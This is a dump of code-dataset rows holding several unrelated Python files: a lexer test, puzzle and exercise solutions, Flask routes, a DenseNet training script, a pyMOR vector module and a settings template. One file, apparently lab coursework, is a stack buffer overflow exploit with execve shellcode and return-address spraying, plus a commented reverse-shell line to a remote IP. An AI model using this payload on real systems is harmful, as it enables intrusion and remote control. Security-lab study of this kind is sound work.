hexsha
stringlengths 40
40
| size
int64 1
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
239
| max_stars_repo_name
stringlengths 5
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
239
| max_issues_repo_name
stringlengths 5
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
239
| max_forks_repo_name
stringlengths 5
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.03M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4a0e87849519fc6c4bb8fc7c0be2f724d3b23139
| 601
|
py
|
Python
|
test/lex_state_norule.py
|
pyarnold/ply
|
98bb0e095d72c8aed9de01c15b65fa096c745ce3
|
[
"Unlicense"
] | 1
|
2020-12-18T01:07:42.000Z
|
2020-12-18T01:07:42.000Z
|
test/lex_state_norule.py
|
pyarnold/ply
|
98bb0e095d72c8aed9de01c15b65fa096c745ce3
|
[
"Unlicense"
] | null | null | null |
test/lex_state_norule.py
|
pyarnold/ply
|
98bb0e095d72c8aed9de01c15b65fa096c745ce3
|
[
"Unlicense"
] | null | null | null |
# lex_state_norule.py
#
# Declaration of a state for which no rules are defined
#
# This is a negative test for ply: the 'example' state below never gets any
# token rules, which should make lex.lex() report an error at build time.
import sys
if ".." not in sys.path:
    sys.path.insert(0, "..")
import ply.lex as lex
# Token names shared by all lexer states.
tokens = [
    "PLUS",
    "MINUS",
    "NUMBER",
]
# Two exclusive states are declared, but rules exist only for 'comment'.
# The ruleless 'example' state is the deliberate defect under test.
states = (('comment', 'exclusive'),
          ('example', 'exclusive'))
t_PLUS = r'\+'
t_MINUS = r'-'
t_NUMBER = r'\d+'
# Comments
def t_comment(t):
    r'/\*'
    # The raw-string docstring above is ply's rule regex — it is behavioral.
    t.lexer.begin('comment')
    print("Entering comment state")
def t_comment_body_part(t):
    r'(.|\n)*\*/'
    print("comment body %s" % t)
    t.lexer.begin('INITIAL')
def t_error(t):
    # Error handling is not under test here; ignore bad input.
    pass
lex.lex()
| 13.659091
| 55
| 0.577371
|
4a0e880cebc522a7c347b6febf0631298ea36e5b
| 2,290
|
py
|
Python
|
2019/Day3.py
|
dueyfinster/adventofcode
|
b05c271b0bb7aa6cea8d1039061a96d1a642cb7b
|
[
"MIT"
] | null | null | null |
2019/Day3.py
|
dueyfinster/adventofcode
|
b05c271b0bb7aa6cea8d1039061a96d1a642cb7b
|
[
"MIT"
] | null | null | null |
2019/Day3.py
|
dueyfinster/adventofcode
|
b05c271b0bb7aa6cea8d1039061a96d1a642cb7b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
from ngu import read_file
import re
def manhattan_dist(pos):
    """Return the Manhattan (taxicab) distance of *pos* from the origin."""
    x, y = pos
    return abs(x) + abs(y)
def convert_to_coords(positions, last_pos, pos_to_calculate, distance, crossings, distances):
    """Walk one wire segment (e.g. "R75"), recording every visited point.

    *positions* is updated in place with each visited (x, y) coordinate and
    *distance* is the cumulative step count along the wire.  Whenever a
    visited point is in *crossings*, its cumulative distance is stored in
    *distances* — first visit only, since the puzzle counts the steps of the
    wire's earliest arrival at a crossing.

    Returns (final_position, final_distance).
    """
    movement = int(re.sub("R|L|U|D", "", pos_to_calculate))
    x, y = last_pos
    # Unit step for this segment's direction.
    if 'R' in pos_to_calculate:
        dx, dy = 1, 0
    elif 'L' in pos_to_calculate:
        dx, dy = -1, 0
    elif 'U' in pos_to_calculate:
        dx, dy = 0, 1
    else:  # 'D'
        dx, dy = 0, -1
    new_pos = last_pos  # robust for a zero-length move (original raised NameError)
    for _ in range(movement):
        x, y = x + dx, y + dy
        new_pos = (x, y)
        positions.add(new_pos)
        distance += 1
        # Keep only the FIRST visit distance.  Bug fix: the original
        # unconditionally overwrote the entry, so a wire re-crossing a point
        # recorded the later (larger) step count.
        if new_pos in crossings and new_pos not in distances:
            distances[new_pos] = distance
    return new_pos, distance
def calculate_positions(wire, crossings):
    """Trace *wire* (a list of moves like "R75") from the origin.

    Returns (visited_positions, distances) where *distances* maps each
    position that is also in *crossings* to the wire's step count there.
    """
    positions = set()
    distances = dict()
    current = (0, 0)
    steps = 0
    for move in wire:
        current, steps = convert_to_coords(
            positions, current, move, steps, crossings, distances)
    return positions, distances
def part1(wire1, wire2):
    """Return (closest crossing's Manhattan distance, the crossing set)."""
    positions_a, _ = calculate_positions(wire1, {})
    positions_b, _ = calculate_positions(wire2, {})
    crossings = positions_a & positions_b
    closest = min(manhattan_dist(point) for point in crossings)
    return closest, crossings
def part2(wire1, wire2, crossings):
    """Return the minimal combined step count of both wires at any crossing.

    *crossings* is the intersection set computed by part1.  (The original
    carried a dead ``lowest_cost_crossing = 0`` initializer and two unused
    position sets; removed.)
    """
    _, w1_distances = calculate_positions(wire1, crossings)
    _, w2_distances = calculate_positions(wire2, crossings)
    return min(w1_distances[pos] + w2_distances[pos] for pos in crossings)
def main():
    """Read the puzzle input (two comma-separated wire paths) and print both answers."""
    content = read_file(3)  # project helper; presumably returns the input lines for day 3 — TODO confirm
    wire1 = content[0].split(",")
    wire2 = content[1].split(",")
    p1_result, crossings = part1(wire1, wire2)
    print("Part 1: {}".format(p1_result))
    # Part 2 reuses the crossing set discovered in part 1.
    p2_result = part2(wire1, wire2, crossings)
    print("Part 2: {}".format(p2_result))
if __name__ == '__main__':
    main()
| 28.625
| 93
| 0.646288
|
4a0e887c11bff05cc63fa41b81253f35cd3d4db2
| 845
|
py
|
Python
|
mockapi/test/urls.py
|
AKSharma01/mock_form
|
e21ac891fd0f31be37329351ca1f500b512f6251
|
[
"Apache-2.0"
] | null | null | null |
mockapi/test/urls.py
|
AKSharma01/mock_form
|
e21ac891fd0f31be37329351ca1f500b512f6251
|
[
"Apache-2.0"
] | null | null | null |
mockapi/test/urls.py
|
AKSharma01/mock_form
|
e21ac891fd0f31be37329351ca1f500b512f6251
|
[
"Apache-2.0"
] | null | null | null |
# URL routing table for the mockapi Flask application.
from flask import Flask, request, render_template, url_for
from views import *
app = Flask(__name__)
# NOTE(review): hard-coded secret key — acceptable for a mock/demo service,
# but should come from configuration in anything production-facing.
app.secret_key = "mockapi.dev"
# Each entry: (URL rule, allowed HTTP methods, view callable from views.py).
urls = [
    ('/', ['GET'], Start.as_view('view')),
    ('/login', ['GET','POST'], Log.as_view('log_alllist')), #- Login into mockapi
    ('/logout', ['GET'], Logout.as_view('logout')), #- Logout
    ('/register', ['POST'], Reg.as_view('reg_alllist')), #- Register user to create their mockform
    ('/mockapi', ['GET','POST'], Dashboard.as_view('dashboard')), # List all the mock API s
    ('/mockapi/new', ['POST'], CreateForm.as_view('createnewform')), #- New Mock API Form
    ('/mockapi/edit/<slug>/<version>', ['GET','POST','PUT'], EditJson.as_view('editslug')), #- Edit {{version}}
    ('/mockapi/<slug>/<version>', ['GET'], ViewJson.as_view('viewmock')) #- View mock apis version wise
]
| 52.8125
| 108
| 0.618935
|
4a0e88ba8dead435285dfd37b907e6397d3138b8
| 183
|
py
|
Python
|
implementations/week3/money_change.py
|
MichelML/edx_algos_micromaster
|
b3e8f3030b2c6c071405d5f6d27d502b4ec177c0
|
[
"MIT"
] | null | null | null |
implementations/week3/money_change.py
|
MichelML/edx_algos_micromaster
|
b3e8f3030b2c6c071405d5f6d27d502b4ec177c0
|
[
"MIT"
] | null | null | null |
implementations/week3/money_change.py
|
MichelML/edx_algos_micromaster
|
b3e8f3030b2c6c071405d5f6d27d502b4ec177c0
|
[
"MIT"
] | null | null | null |
# Uses python3
import sys
def get_change(m):
    """Return the minimum number of coins (denominations 10, 5, 1) summing to m."""
    tens, rem = divmod(m, 10)
    fives, ones = divmod(rem, 5)
    return tens + fives + ones
if __name__ == '__main__':
    # Read the amount from stdin and print the minimal coin count.
    m = int(input())
    print(get_change(m))
| 18.3
| 44
| 0.579235
|
4a0e88da58c6223a8616883986829b83d18b704e
| 466
|
py
|
Python
|
setup.py
|
omadson/triggercmd-cli
|
52392024cc5f3f00f66207b460ba7296c838964e
|
[
"MIT"
] | 8
|
2021-09-18T11:33:41.000Z
|
2021-10-07T15:39:19.000Z
|
setup.py
|
omadson/triggercmd-cli
|
52392024cc5f3f00f66207b460ba7296c838964e
|
[
"MIT"
] | 5
|
2021-09-22T13:27:59.000Z
|
2021-10-14T14:24:43.000Z
|
setup.py
|
omadson/triggercmd-cli
|
52392024cc5f3f00f66207b460ba7296c838964e
|
[
"MIT"
] | 3
|
2021-09-22T01:46:28.000Z
|
2021-10-13T22:47:11.000Z
|
# -*- coding: utf-8 -*-
# Packaging script for the triggercmd_cli distribution.
from setuptools import setup
setup(
    name="triggercmd_cli",
    version="0.1.0",
    # NOTE(review): URL and author point at GussSoares' repository while this
    # copy lives elsewhere — confirm the intended upstream before publishing.
    url="https://github.com/GussSoares/triggercmd-cli",
    license="MIT License",
    author="Gustavo Soares",
    author_email="gustavo.soares.cdc@gmail.com",
    keywords="triggercmd alexa echo-dot cli archlinux manjaro",
    description=u"CLI to TriggerCMD to archlinux distribuction based.",
    packages=["triggercmd_cli"],
    # NOTE(review): no runtime dependencies declared — verify the CLI really
    # needs nothing beyond the standard library.
    install_requires=[],
)
| 29.125
| 71
| 0.693133
|
4a0e88db3c70c2762c7a660320dc245a136753ee
| 6,653
|
py
|
Python
|
model/densenet169/model119_val1.py
|
wan-h/JD-AI-Fashion-Challenge
|
817f693672f418745e3a4c89a0417a3165b08130
|
[
"MIT"
] | 3
|
2018-05-06T15:15:21.000Z
|
2018-05-13T12:31:42.000Z
|
model/densenet169/model119_val1.py
|
wan-h/JD-AI-Fashion-Challenge
|
817f693672f418745e3a4c89a0417a3165b08130
|
[
"MIT"
] | null | null | null |
model/densenet169/model119_val1.py
|
wan-h/JD-AI-Fashion-Challenge
|
817f693672f418745e3a4c89a0417a3165b08130
|
[
"MIT"
] | null | null | null |
"""
以model 4为基础,新增real crop
"""
import math
import os
import queue
import time
import keras
from keras.layers import Dense, BatchNormalization, Activation
import config
from util import data_loader
from util import keras_util
from util.keras_util import KerasModelConfig
model_config = KerasModelConfig(k_fold_file="1.txt",
model_path=os.path.abspath(__file__),
image_resolution=344,
data_type=[config.DATA_TYPE_ORIGINAL],
label_position=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12],
train_batch_size=[16, 16],
data_visualization=True,
val_batch_size=256,
predict_batch_size=256,
epoch=[2, 6],
lr=[0.0001, 0.00001],
clr=False,
freeze_layers=[0, 0],
input_norm=False)
def get_model(freeze_layers=-1, lr=0.01, output_dim=1, weights="imagenet"):
    """Build a DenseNet169-based multi-label sigmoid classifier.

    Parameters
    ----------
    freeze_layers : int or float
        -1 freezes the entire base model; a value in (0, 1) freezes that
        fraction of the base layers; an int >= 1 freezes that many layers.
    lr : float
        Adam learning rate.
    output_dim : int
        Number of sigmoid outputs (one per label).
    weights : str or None
        Initial weights for the base model ("imagenet" or None).
    """
    base_model = keras.applications.DenseNet169(include_top=False, weights=weights,
                                                input_shape=model_config.image_shape, pooling="avg")
    x = base_model.output
    x = Dense(256, use_bias=False)(x)
    x = BatchNormalization()(x)
    x = Activation("relu")(x)
    predictions = Dense(units=output_dim, activation='sigmoid')(x)
    model = keras.Model(inputs=base_model.input, outputs=predictions)
    if freeze_layers == -1:
        print("freeze all basic layers, lr=%f" % lr)
        for layer in base_model.layers:
            layer.trainable = False
    else:
        if freeze_layers < 1:
            freeze_layers = math.floor(len(base_model.layers) * freeze_layers)
        for layer in range(freeze_layers):
            # Bug fix: the original set a nonexistent ``train_layer``
            # attribute, which silently left these layers trainable.
            base_model.layers[layer].trainable = False
        print("freeze %d basic layers, lr=%f" % (freeze_layers, lr))
    model.compile(loss="binary_crossentropy",
                  optimizer=keras.optimizers.Adam(lr=lr))
    # model.summary()
    print("basic model have %d layers" % len(base_model.layers))
    return model
def train():
    """Run the staged training loop defined by ``model_config``.

    Stage ``i`` trains with lr[i]/freeze_layers[i] up to epoch[i].  Training
    is resumable: ``get_init_stage`` picks the stage to restart from, and
    weights from ``initial_epoch`` or the previous stage's final epoch are
    reloaded.  Evaluation runs asynchronously on a daemon thread fed through
    ``evaluate_queue``.
    """
    cb = []
    evaluate_queue = queue.Queue()
    evaluate_task = keras_util.EvaluateTask(evaluate_queue)
    evaluate_task.setDaemon(True)
    evaluate_task.start()
    checkpoint = keras_util.EvaluateCallback(model_config, evaluate_queue)
    cb.append(checkpoint)
    start = time.time()
    model_config.save_log("####### start train model")
    init_stage = model_config.get_init_stage()
    model_config.save_log("####### init stage is %d" % init_stage)
    for i in range(init_stage, len(model_config.epoch)):
        model_config.save_log("####### lr=%f, freeze layers=%2f epoch=%d" % (
            model_config.lr[i], model_config.freeze_layers[i], model_config.epoch[i]))
        if model_config.clr:
            # Cyclic learning rate oscillating between lr and 5*lr, with a
            # half-epoch step size.
            clr = keras_util.CyclicLrCallback(base_lr=model_config.lr[i], max_lr=model_config.lr[i] * 5,
                                              step_size=model_config.get_steps_per_epoch(i) / 2)
            cb.append(clr)
        train_flow = data_loader.KerasGenerator(model_config=model_config) \
            .flow_from_files(model_config.train_files,
                             mode="fit",
                             target_size=model_config.image_size,
                             batch_size=
                             model_config.train_batch_size[i],
                             shuffle=True,
                             label_position=model_config.label_position)
        if i == 0:
            # First stage: fresh (imagenet-initialized) model, no resume.
            model_config.save_log("####### initial epoch is 0, end epoch is %d" % model_config.epoch[i])
            model = get_model(freeze_layers=model_config.freeze_layers[i], lr=model_config.lr[i],
                              output_dim=len(model_config.label_position))
            model.fit_generator(generator=train_flow,
                                steps_per_epoch=model_config.get_steps_per_epoch(i),
                                epochs=model_config.epoch[i],
                                workers=16,
                                verbose=1,
                                callbacks=cb)
        else:
            # Later stages: build with weights=None, then load a checkpoint.
            model = get_model(freeze_layers=model_config.freeze_layers[i], output_dim=len(model_config.label_position),
                              lr=model_config.lr[i], weights=None)
            if i == init_stage:
                # Resuming this stage: restart from the recorded initial_epoch.
                model_config.save_log(
                    "####### load weight file: %s" % model_config.get_weights_path(model_config.initial_epoch))
                model.load_weights(model_config.get_weights_path(model_config.initial_epoch))
                model_config.save_log("####### initial epoch is %d, end epoch is %d" % (
                    model_config.initial_epoch, model_config.epoch[i]))
                model.fit_generator(generator=train_flow,
                                    steps_per_epoch=model_config.get_steps_per_epoch(i),
                                    epochs=model_config.epoch[i],
                                    initial_epoch=model_config.initial_epoch,
                                    workers=16,
                                    verbose=1,
                                    callbacks=cb)
            else:
                # Normal stage transition: continue from the previous stage's
                # final epoch.
                model_config.save_log(
                    "####### load weight file: %s" % model_config.get_weights_path(model_config.epoch[i - 1]))
                model.load_weights(model_config.get_weights_path(model_config.epoch[i - 1]))
                model_config.save_log(
                    "####### initial epoch is %d, end epoch is %d" % (model_config.epoch[i - 1], model_config.epoch[i]))
                model.fit_generator(generator=train_flow,
                                    steps_per_epoch=model_config.get_steps_per_epoch(i),
                                    epochs=model_config.epoch[i],
                                    initial_epoch=model_config.epoch[i - 1],
                                    workers=16,
                                    verbose=1,
                                    callbacks=cb)
    model_config.save_log("####### train model spend %d seconds" % (time.time() - start))
    model_config.save_log(
        "####### train model spend %d seconds average" % ((time.time() - start) / model_config.epoch[-1]))
    # Wait for the last asynchronous evaluation to finish.
    time.sleep(60)
| 46.852113
| 121
| 0.533444
|
4a0e89cb3339f6b036a20c39f85fd70b71fe0fa3
| 1,880
|
py
|
Python
|
ProgrammingProject2/tasks/task4b.py
|
samuelmmorse/MGSsecurity
|
425621afca366244cdcdc5b991538a618d45fd12
|
[
"Apache-2.0"
] | null | null | null |
ProgrammingProject2/tasks/task4b.py
|
samuelmmorse/MGSsecurity
|
425621afca366244cdcdc5b991538a618d45fd12
|
[
"Apache-2.0"
] | null | null | null |
ProgrammingProject2/tasks/task4b.py
|
samuelmmorse/MGSsecurity
|
425621afca366244cdcdc5b991538a618d45fd12
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python3
# SEED-labs-style stack-overflow payload builder: writes `badfile` containing
# a NOP sled, shellcode at the end of a 517-byte buffer, and a spray of
# guessed return addresses at the start.  Educational exploit code.
import sys
# 32-bit x86 execve shellcode; the leading stub patches the '*' markers below
# into NUL terminators and fills the AAAA/BBBB/CCCC/DDDD argv placeholders.
# Do not edit the byte strings — offsets are position-sensitive.
shellcode= (
  "\xeb\x29\x5b\x31\xc0\x88\x43\x09\x88\x43\x0c\x88\x43\x47\x89\x5b"
  "\x48\x8d\x4b\x0a\x89\x4b\x4c\x8d\x4b\x0d\x89\x4b\x50\x89\x43\x54"
  "\x8d\x4b\x48\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xe8\xd2\xff\xff\xff"
  "/bin/bash*"
  "-c*"
  # You can modify the following command string to run any command.
  # You can even run multiple commands. When you change the string,
  # make sure that the position of the * at the end doesn't change.
  # The code above will change the byte at this position to zero,
  # so the command string ends here.
  # You can delete/add spaces, if needed, to keep the position the same.
  # The * in this line serves as the position marker            *
  #"/bin/bash -i > /dev/tcp/10.9.0.1/9090 0<&1 2>&1             *"
  "echo 'Hi! You have been hacked :(' *"
  "AAAA"   # Placeholder for argv[0] --> "/bin/bash"
  "BBBB"   # Placeholder for argv[1] --> "-c"
  "CCCC"   # Placeholder for argv[2] --> the command string
  "DDDD"   # Placeholder for argv[3] --> NULL
).encode('latin-1')
# Fill the content with NOP's
content = bytearray(0x90 for i in range(517))
##################################################################
# Put the shellcode somewhere in the payload
start = 517 - len(shellcode)               # Change this number
content[start:start + len(shellcode)] = shellcode
# Address of the start of the buffer
buffer = 0xffffd2c8
# point to the beginning of our NOP's, it will catch the shellcode
ret    = buffer + 300
# add 75 return addresses to the buffer (to fill the potential range)
ret_splash = 75
for offset in range(ret_splash):
  # Little-endian 4-byte return address at each 4-byte slot.
  content[offset*4:offset*4 + 4] = (ret).to_bytes(4,byteorder='little')
##################################################################
# Write the content to a file
with open('badfile', 'wb') as f:
  f.write(content)
| 37.6
| 74
| 0.612234
|
4a0e8b034a0f6ac8cce9ab1dd9999ff83d81e3cf
| 8,576
|
py
|
Python
|
src/pymor/vectorarrays/block.py
|
lbalicki/pymor
|
8de5f16499b95a48c6332449677540383548dc3e
|
[
"Unlicense"
] | null | null | null |
src/pymor/vectorarrays/block.py
|
lbalicki/pymor
|
8de5f16499b95a48c6332449677540383548dc3e
|
[
"Unlicense"
] | null | null | null |
src/pymor/vectorarrays/block.py
|
lbalicki/pymor
|
8de5f16499b95a48c6332449677540383548dc3e
|
[
"Unlicense"
] | 1
|
2021-03-03T15:18:24.000Z
|
2021-03-03T15:18:24.000Z
|
# This file is part of the pyMOR project (http://www.pymor.org).
# Copyright 2013-2019 pyMOR developers and contributors. All rights reserved.
# License: BSD 2-Clause License (http://opensource.org/licenses/BSD-2-Clause)
from functools import reduce
from numbers import Number
import numpy as np
from pymor.core.interfaces import classinstancemethod
from pymor.vectorarrays.interfaces import VectorArrayInterface, VectorSpaceInterface
class BlockVectorArray(VectorArrayInterface):
    """|VectorArray| where each vector is a direct sum of sub-vectors.
    Given a list of equal length |VectorArrays| `blocks`, this |VectorArray|
    represents the direct sums of the vectors contained in the arrays.
    The associated |VectorSpace| is :class:`BlockVectorSpace`.
    :class:`BlockVectorArray` can be used in conjunction with
    :class:`~pymor.operators.block.BlockOperator`.
    """
    def __init__(self, blocks, space):
        self._blocks = tuple(blocks)
        self.space = space
        assert self._blocks_are_valid()
    def to_numpy(self, ensure_copy=False):
        # Concatenate the blocks' dof columns into a single 2d array.
        return np.hstack([block.to_numpy() for block in self._blocks])
    @property
    def real(self):
        return BlockVectorArray([block.real for block in self._blocks], self.space)
    @property
    def imag(self):
        return BlockVectorArray([block.imag for block in self._blocks], self.space)
    def conj(self):
        return BlockVectorArray([block.conj() for block in self._blocks], self.space)
    def block(self, ind):
        """
        Returns a copy of each block (no slicing).
        """
        assert self._blocks_are_valid()
        if isinstance(ind, (tuple, list)):
            assert all(isinstance(ii, Number) for ii in ind)
            return tuple(self._blocks[ii].copy() for ii in ind)
        else:
            assert isinstance(ind, Number)
            return self._blocks[ind].copy()
    @property
    def num_blocks(self):
        return len(self._blocks)
    def __len__(self):
        # All blocks have equal length (see _blocks_are_valid), so the first
        # one is representative.
        return len(self._blocks[0])
    def __getitem__(self, ind):
        # Indexing yields a non-copying view on this array.
        return BlockVectorArrayView(self, ind)
    def __delitem__(self, ind):
        assert self.check_ind(ind)
        for block in self._blocks:
            del block[ind]
    def append(self, other, remove_from_other=False):
        assert self._blocks_are_valid()
        assert other in self.space
        for block, other_block in zip(self._blocks, other._blocks):
            block.append(other_block, remove_from_other=remove_from_other)
    def copy(self, deep=False):
        return BlockVectorArray([block.copy(deep) for block in self._blocks], self.space)
    def scal(self, alpha):
        for block in self._blocks:
            block.scal(alpha)
    def axpy(self, alpha, x):
        # In-place self += alpha * x, delegated blockwise.
        assert x in self.space
        # alpha may be a scalar or one coefficient per vector.
        assert isinstance(alpha, Number) \
            or isinstance(alpha, np.ndarray) and alpha.shape == (len(self),)
        if len(x) > 0:
            for block, x_block in zip(self._blocks, x._blocks):
                block.axpy(alpha, x_block)
        else:
            assert len(self) == 0
    def dot(self, other):
        assert other in self.space
        # Inner products over a direct sum decompose into sums of blockwise
        # inner products; accumulate in a dtype-promoted result array.
        dots = [block.dot(other_block) for block, other_block in zip(self._blocks, other._blocks)]
        assert all([dot.shape == dots[0].shape for dot in dots])
        common_dtype = reduce(np.promote_types, (dot.dtype for dot in dots))
        ret = np.zeros(dots[0].shape, dtype=common_dtype)
        for dot in dots:
            ret += dot
        return ret
    def pairwise_dot(self, other):
        assert other in self.space
        # Same accumulation scheme as dot(), but pairwise per vector.
        dots = [block.pairwise_dot(other_block)
                for block, other_block in zip(self._blocks, other._blocks)]
        assert all([dot.shape == dots[0].shape for dot in dots])
        common_dtype = reduce(np.promote_types, (dot.dtype for dot in dots))
        ret = np.zeros(dots[0].shape, dtype=common_dtype)
        for dot in dots:
            ret += dot
        return ret
    def lincomb(self, coefficients):
        lincombs = [block.lincomb(coefficients) for block in self._blocks]
        return BlockVectorArray(lincombs, self.space)
    def l1_norm(self):
        return np.sum(np.array([block.l1_norm() for block in self._blocks]), axis=0)
    def l2_norm(self):
        return np.sqrt(np.sum(np.array([block.l2_norm2() for block in self._blocks]), axis=0))
    def l2_norm2(self):
        return np.sum(np.array([block.l2_norm2() for block in self._blocks]), axis=0)
    def sup_norm(self):
        return np.max(np.array([block.sup_norm() for block in self._blocks]), axis=0)
    def dofs(self, dof_indices):
        # Map global dof indices to (block, local index) pairs using the bins
        # cached by _compute_bins, then gather one column per requested dof.
        dof_indices = np.array(dof_indices)
        if not len(dof_indices):
            return np.zeros((len(self), 0))
        self._compute_bins()
        block_inds = np.digitize(dof_indices, self._bins) - 1
        dof_indices -= self._bins[block_inds]
        block_inds = self._bin_map[block_inds]
        blocks = self._blocks
        return np.array([blocks[bi].dofs([ci])[:, 0]
                         for bi, ci in zip(block_inds, dof_indices)]).T
    def amax(self):
        # Per-block (argmax, max) for each vector, then pick the winning
        # block per vector and translate its local index to a global dof.
        self._compute_bins()
        blocks = self._blocks
        inds, vals = zip(*(blocks[bi].amax() for bi in self._bin_map))
        inds, vals = np.array(inds), np.array(vals)
        # Shift local indices by the cumulative dof offset of each block.
        inds += self._bins[:-1][..., np.newaxis]
        block_inds = np.argmax(vals, axis=0)
        ar = np.arange(inds.shape[1])
        return inds[block_inds, ar], vals[block_inds, ar]
    def _blocks_are_valid(self):
        # Invariant: every block holds the same number of vectors.
        return all([len(block) == len(self._blocks[0]) for block in self._blocks])
    def _compute_bins(self):
        # Lazily cache cumulative dof offsets.  Zero-dimensional subspaces
        # are skipped; _bin_map records the indices of the surviving blocks.
        if not hasattr(self, '_bins'):
            dims = np.array([subspace.dim for subspace in self.space.subspaces])
            self._bin_map = bin_map = np.where(dims > 0)[0]
            self._bins = np.cumsum(np.hstack(([0], dims[bin_map])))
class BlockVectorSpace(VectorSpaceInterface):
    """|VectorSpace| of :class:`BlockVectorArrays <BlockVectorArray>`.
    A :class:`BlockVectorSpace` is defined by the |VectorSpaces| of the
    individual subblocks which constitute a given array. In particular
    for a given :class`BlockVectorArray` `U`, we have the identity ::
        (U.blocks[0].space, U.blocks[1].space, ..., U.blocks[-1].space) == U.space.
    Parameters
    ----------
    subspaces
        The tuple defined above.
    """
    def __init__(self, subspaces):
        subspaces = tuple(subspaces)
        assert all([isinstance(subspace, VectorSpaceInterface) for subspace in subspaces])
        self.subspaces = subspaces
    def __eq__(self, other):
        # Equal iff other is a BlockVectorSpace with pairwise-equal subspaces
        # (order matters).
        return (type(other) is BlockVectorSpace
                and len(self.subspaces) == len(other.subspaces)
                and all(space == other_space for space, other_space in zip(self.subspaces, other.subspaces)))
    def __hash__(self):
        # Sum of subspace hashes: order-insensitive, but still a valid hash
        # since equal spaces (per __eq__) have equal subspace hashes.
        return sum(hash(s) for s in self.subspaces)
    @property
    def dim(self):
        return sum(subspace.dim for subspace in self.subspaces)
    def zeros(self, count=1, reserve=0):
        return BlockVectorArray([subspace.zeros(count=count, reserve=reserve) for subspace in self.subspaces], self)
    @classinstancemethod
    def make_array(cls, obj):
        # Class-level variant: infer the space from the blocks' own spaces.
        assert len(obj) > 0
        return cls(tuple(o.space for o in obj)).make_array(obj)
    @make_array.instancemethod
    def make_array(self, obj):
        """:noindex:"""
        assert len(obj) == len(self.subspaces)
        assert all(block in subspace for block, subspace in zip(obj, self.subspaces))
        return BlockVectorArray(obj, self)
    def make_block_diagonal_array(self, obj):
        # Build an array with len(obj[0]) + len(obj[1]) + ... vectors where
        # the i-th group of vectors is nonzero only in block i.
        assert len(obj) == len(self.subspaces)
        assert all(block in subspace for block, subspace in zip(obj, self.subspaces))
        U = self.empty(reserve=sum(len(UU) for UU in obj))
        for i, UU in enumerate(obj):
            U.append(self.make_array([s.zeros(len(UU)) if j != i else UU for j, s in enumerate(self.subspaces)]))
        return U
    def from_numpy(self, data, ensure_copy=False):
        # Split the columns of data at the cumulative subspace dimensions and
        # hand each slice to the corresponding subspace.
        if data.ndim == 1:
            data = data.reshape(1, -1)
        data_ind = np.cumsum([0] + [subspace.dim for subspace in self.subspaces])
        return BlockVectorArray([subspace.from_numpy(data[:, data_ind[i]:data_ind[i + 1]], ensure_copy=ensure_copy)
                                 for i, subspace in enumerate(self.subspaces)], self)
class BlockVectorArrayView(BlockVectorArray):
    """Non-copying view on a :class:`BlockVectorArray`, created by indexing it."""
    is_view = True
    def __init__(self, base, ind):
        # Deliberately does not call BlockVectorArray.__init__: a view shares
        # its blocks' data with the base array, so no re-validation is needed.
        block_views = [blk[ind] for blk in base._blocks]
        self._blocks = tuple(block_views)
        self.space = base.space
| 36.965517
| 116
| 0.642024
|
4a0e8b07fe4418fb909aa16142e980e3c9484174
| 326
|
py
|
Python
|
settings.dist.py
|
uguratar/pyzico
|
b779d590b99392df60db7c5e2df832708df9b6a2
|
[
"MIT"
] | 6
|
2015-05-03T10:48:54.000Z
|
2018-03-06T12:36:02.000Z
|
settings.dist.py
|
uguratar/pyzico
|
b779d590b99392df60db7c5e2df832708df9b6a2
|
[
"MIT"
] | 1
|
2021-06-01T22:06:45.000Z
|
2021-06-01T22:06:45.000Z
|
settings.dist.py
|
uguratar/pyzico
|
b779d590b99392df60db7c5e2df832708df9b6a2
|
[
"MIT"
] | null | null | null |
url = "https://iyziconnect.com/post/v1/"
delete_card_url = "https://iyziconnect.com/delete-card/v1/"
register_card_url = "https://iyziconnect.com/register-card/v1/"
bin_check_url = "https://api.iyzico.com/bin-check"
installment_url = "https://iyziconnect.com/installment/v1/"
api_id = ""
api_secret = ""
mode = "test" # live
| 36.222222
| 63
| 0.726994
|
4a0e8b7da03b385c235bea5dd25866ac313be6eb
| 5,476
|
py
|
Python
|
at_tmp/model/FUNC/RQMT_OPT.py
|
zuoleilei3253/zuoleilei
|
e188b15a0aa4a9fde00dba15e8300e4b87973e2d
|
[
"Apache-2.0"
] | null | null | null |
at_tmp/model/FUNC/RQMT_OPT.py
|
zuoleilei3253/zuoleilei
|
e188b15a0aa4a9fde00dba15e8300e4b87973e2d
|
[
"Apache-2.0"
] | null | null | null |
at_tmp/model/FUNC/RQMT_OPT.py
|
zuoleilei3253/zuoleilei
|
e188b15a0aa4a9fde00dba15e8300e4b87973e2d
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/7/16 17:11
# @Author : bxf
# @File : RQMT_OPT.py
# @Software: PyCharm
from model.util.TMP_PAGINATOR import *
from model.util.PUB_RESP import *
from model.util.newID import *
class RQMT_OPT:
    """CRUD operations for requirement records (table t_requirements_info)."""
    def get_lists(self, data,token):
        '''
        Fetch the paginated requirement list.
        :return: JSON response string
        '''
        try:
            page = data.get('_page')
            records = data.get('_limit')
            group_id=data.get('group_id')
